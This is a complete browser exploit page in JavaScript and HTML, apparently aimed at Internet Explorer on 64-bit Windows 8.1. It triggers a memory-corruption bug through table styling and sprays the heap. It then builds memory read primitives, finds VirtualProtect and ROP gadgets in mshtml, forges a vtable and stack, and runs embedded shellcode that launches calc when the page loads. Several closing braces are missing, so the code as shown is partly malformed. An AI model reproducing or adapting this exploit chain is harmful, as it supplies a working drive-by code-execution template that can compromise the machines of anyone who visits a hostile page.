 var magic = 25001; //if the exploit doesn't work for you try selecting another number in the range 25000 -/+ 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits;
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 setTimeout(cont, 100);  

//heap spray
function spray() {
 var aa = "aa";

 //create a bunch of String and Array objects
 for(var i=0;i<50000;i++) {
   strarr[i] = aa.toUpperCase();
   arrarr[i] = new Array(1,2,3,4,5);

 //heap-spray with pointers to a String object
 for(var i=0;i<2000;i++) {
   var tmparr = new Array(16000);
   for(var j=0;j<16000;j++) {
     tmparr[j] = strarr[magic];
   sprayarr[i] = tmparr;


function cont() {
 if(numsploits < 5) {
 if(numsploits < 6) {
   setTimeout(afterFirstOverwrite, 0);

function afterFirstOverwrite() {
 //check which array was overwritten
 for(var i=24000;i<25000;i++) {
   arrarr[i][18] = 1;
   var a = arrarr[i][4];
   var b = arrarr[i][16];
   var c = arrarr[i][17];
   if(typeof(b)!="undefined") {
     arrindex = i;
     addrlo = b;
     addrhi = c;
 if(arrindex < 0) {
   alert("Exploit failed, error overwriting array");
 //re-spray to overwrite buffer capacity
 for(var i=0;i<2000;i++) {
   sprayarr[i] = new Array(32000);
 for(var i=0;i<2000;i++) {
   for(var j=0;j<32000;j++) {
     if(j%2 == 0) {
       sprayarr[i][j] = addrlo + 8 - 0xBF4 + 3;
     } else {
       sprayarr[i][j] = addrhi;

//unsigned to signed conversion
function u2s(i) {
 if(i>0x80000000) {
   return -(0xFFFFFFFF - i + 1);
 } else {
   return i;

//signed to unsigned conversion
function s2u(i) {
 if(i<0) {
   return (0xFFFFFFFF + i + 1);
 } else {
   return i;

//memory disclosure helper function, read 32-bit number from a given address
function read32(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0) + 0x10000 * strarr[strindex].charCodeAt(1);

//memory disclosure helper function, read 16-bit number from a given address
function read16(addrhi, addrlo) {
 arrarr[arrindex][strobjidx + 6] = u2s(addrlo);
 arrarr[arrindex][strobjidx + 7] = addrhi;
 return strarr[strindex].charCodeAt(0);

function afterSecondOverwrite() {
 arrindex = arrindex + 1;
 //adjusts the array length - gives us some space to read and write memory
 arrarr[arrindex][2+0x5000/4] = 0;
 //search for the next string object and overwrite its length and content ptr to write jscript9
 for(var i=1;i<=5;i++) {
   if((arrarr[arrindex][2 + i*0x400 - 0x20] == 2) && (arrarr[arrindex][3 + i*0x400 - 0x20] == 0)) {
     strobjidx = i*0x400 - 0x20 - 2;
     arrarr[arrindex][strobjidx+4] = 4;
     for(var j=20000;j<30000;j++) {
       if(strarr[j].length != 2) {
         strindex = j;
 if(strindex < 0) {
   alert("Exploit failed, couldn't overwrite string length");

 //create a mshtml object and follow references to its vtable ptr
 var lo1,hi1,lo2,hi2;
 arrarr[arrindex+1][0] = document.createElement("button");
 lo1 = s2u(arrarr[arrindex][6+0x28/4]);
 hi1 = arrarr[arrindex][6+0x28/4 + 1];
 lo2 = read32(hi1, lo1+0x18);
 hi2 = read32(hi1, lo1+0x18+4);
 mshtmllo = read32(hi2, lo2+0x20);
 mshtmlhi = read32(hi2, lo2+0x20+4);
 //find the module base
 mshtmllo = mshtmllo - mshtmllo % 0x1000;
 while(mshtmllo>0) {
   if(read16(mshtmlhi,mshtmllo) == 0x5A4D) break;
   mshtmllo = mshtmllo - 0x1000;

 //find the address of VirtualProtect in the IAT
 var coff = read32(mshtmlhi, mshtmllo + 0x3C);
 var idata = read32(mshtmlhi, mshtmllo + coff + 4 + 20 + 120);
 var iat = read32(mshtmlhi, mshtmllo + idata + 16);
 var vplo =  read32(mshtmlhi, mshtmllo + iat + 0x8a8);
 var vphi =  read32(mshtmlhi, mshtmllo + iat + 0x8a8 + 4);

 //find the rop gadgets in mshtml
 var pivotlo = -1;
 arrarr[arrindex][strobjidx + 4] = 0x01000000;
 arrarr[arrindex][strobjidx + 6] = u2s(mshtmllo);
 arrarr[arrindex][strobjidx + 7] = mshtmlhi;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5C50)
     &&(strarr[strindex].charCodeAt(i+1) == 0xD285)
     &&(strarr[strindex].charCodeAt(i+2) == 0x0874)
     &&(strarr[strindex].charCodeAt(i+3) == 0x408b))
     pivotlo = mshtmllo + i*2;
   if((strarr[strindex].charCodeAt(i) == 0x508B)
     &&(strarr[strindex].charCodeAt(i+1) == 0x855C)
     &&(strarr[strindex].charCodeAt(i+2) == 0x74D2)
     &&(strarr[strindex].charCodeAt(i+3) == 0x8b08))
     pivotlo = mshtmllo + i*2 + 1;
 if(pivotlo < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var poprcx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC359) {
     poprcx = mshtmllo + i*2;
 if(poprcx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var poprdx = -1;
 for(var i=0x800;i<0x900000;i++) {
   if(strarr[strindex].charCodeAt(i) == 0xC35A) {
     poprdx = mshtmllo + i*2;
 if(poprdx < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 var popr8 = -1;
 for(var i=0x800;i<0x900000;i++) {
   if((strarr[strindex].charCodeAt(i) == 0x5841) && (strarr[strindex].charCodeAt(i+1) % 256 == 0xC3)) {
     popr8 = mshtmllo + i*2;
   if((Math.floor(strarr[strindex].charCodeAt(i)/256) == 0x41) && (strarr[strindex].charCodeAt(i+1) == 0xC358)) {
     popr8 = mshtmllo + i*2 + 1;
 if(popr8 < 0) {
   alert("Exploit failed, couldn't find ROP gadgets");

 //prepare the fake vtable
 var eaxoffset = 6 + 0x20;
 arrarr[arrindex][eaxoffset + 0x98/4] = u2s(pivotlo);
 arrarr[arrindex][eaxoffset + 0x98/4 + 1] = mshtmlhi;
 //prepare the fake stack
 arrarr[arrindex][eaxoffset] = u2s(poprcx);
 arrarr[arrindex][eaxoffset + 1] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 2] = addrlo;
 arrarr[arrindex][eaxoffset + 3] = addrhi;
 arrarr[arrindex][eaxoffset + 4] = u2s(poprdx);
 arrarr[arrindex][eaxoffset + 5] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 6] = 0x1000;
 arrarr[arrindex][eaxoffset + 7] = 0;
 arrarr[arrindex][eaxoffset + 8] = u2s(popr8);
 arrarr[arrindex][eaxoffset + 9] = mshtmlhi;
 arrarr[arrindex][eaxoffset + 10] = 0x40;
 arrarr[arrindex][eaxoffset + 11] = 0;
 arrarr[arrindex][eaxoffset + 12] = u2s(vplo);
 arrarr[arrindex][eaxoffset + 13] = u2s(vphi);
 arrarr[arrindex][eaxoffset + 14] = addrlo + 24 + eaxoffset*4 + 50*4;
 arrarr[arrindex][eaxoffset + 15] = addrhi;

 //encode the shellcode
 for(var i=0;i<Math.floor(shellcode.length/4);i++) {
    arrarr[arrindex][eaxoffset + 50 + i] = u2s(shellcode[i*4+3]*0x1000000 + shellcode[i*4+2]*0x10000 + shellcode[i*4+1]*0x100 + shellcode[i*4]);

 //overwrite a vtable of jscript9 object and trigger a virtual call
 arrarr[arrindex][7] = addrhi;
 arrarr[arrindex][6] = addrlo + 24 + eaxoffset*4;
 //arrarr[arrindex][7] = 0x123456;
 //arrarr[arrindex][6] = 0x123456;


function run() {
 numsploits = 0;
 window.setTimeout(spray, 1000);

<body onload=run()>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>